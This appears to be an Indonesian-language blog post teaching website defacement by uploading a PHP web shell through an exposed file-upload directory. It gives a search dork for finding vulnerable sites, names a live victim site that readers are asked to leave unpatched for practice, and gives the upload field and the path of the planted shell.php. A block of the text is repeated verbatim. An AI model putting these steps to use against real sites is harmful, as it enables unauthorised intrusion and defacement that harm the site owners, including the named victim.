Deface Array Files Shell Upload Vulnerabilitiy
Dork : inurl:/server/php/files site:.br
*dork bisa di kembangkan
exploit : site.com/{patch}/server/php/
search di google y ^^
disini saya sudah ada target live
http://www.de.mot.go.th/media/server/php/
mohon jgn dipatch untuk pembelajaran yg lain
contoh vuln itu ada banyak tapi ditarget kita contoh vuln nya seperti ini
jika sudah seperti ini kita masukan taget ke csrf nya
dan isi Post File nya files[]
link csrf
jika seperti ini kita check shell nya
kita check aja shell nya
site.com/[patch]/server/php/files/shell.php
Special thanks
Zar0us - 0N3R1D3R - Mr.N00B - Kyu_Kazami - Z-I SLOW - Jingklong - NoNameUser - Yoshinoo48
Yukiteru404 - 3Xxplor5 - FakExpl0it - W!!!BU4SW -Y0UR_$31F - Mr.Greatskiller - yermek
dan isi Post File nya files[]
link csrf
jika seperti ini kita check shell nya
kita check aja shell nya
site.com/[patch]/server/php/files/shell.php
Special thanks
Zar0us - 0N3R1D3R - Mr.N00B - Kyu_Kazami - Z-I SLOW - Jingklong - NoNameUser - Yoshinoo48
Yukiteru404 - 3Xxplor5 - FakExpl0it - W!!!BU4SW -Y0UR_$31F - Mr.Greatskiller - yermek
0 comments:
Post a Comment